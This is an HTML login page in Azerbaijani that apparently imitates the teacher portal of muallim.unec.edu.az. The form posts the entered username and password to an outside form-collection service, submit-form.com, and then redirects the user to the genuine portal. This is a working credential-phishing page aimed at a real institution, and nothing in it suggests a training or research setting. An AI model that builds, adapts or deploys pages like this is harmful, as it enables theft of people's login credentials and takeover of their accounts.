<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
<form action="https://submit-form.com/wf6bN1Sx">
    <input
            type="hidden"
            name="_redirect"
            value="https://muallim.unec.edu.az/"
    />
    <div class="loginbox-textbox">
        <input class="user-l" placeholder="İstifadəçi adı" name="LoginForm[username]" id="LoginForm_username" type="text">    		                                </div>

    <div class="loginbox-textbox">
        <input class="password-l" placeholder="Şifrə" style="margin-bottom: 4%;" name="LoginForm[password]" id="LoginForm_password" type="password">    		                                </div>

    <div class="loginbox-forgot"></div>

    <div class="loginbox-textox" style="text-align: center;"></div>

    <div class="loginbox-submit">
        <input class="btn btn-primary btn-block" type="submit" name="yt0" value="Daxil ol">                    </div>

</form>
</body>
</html>
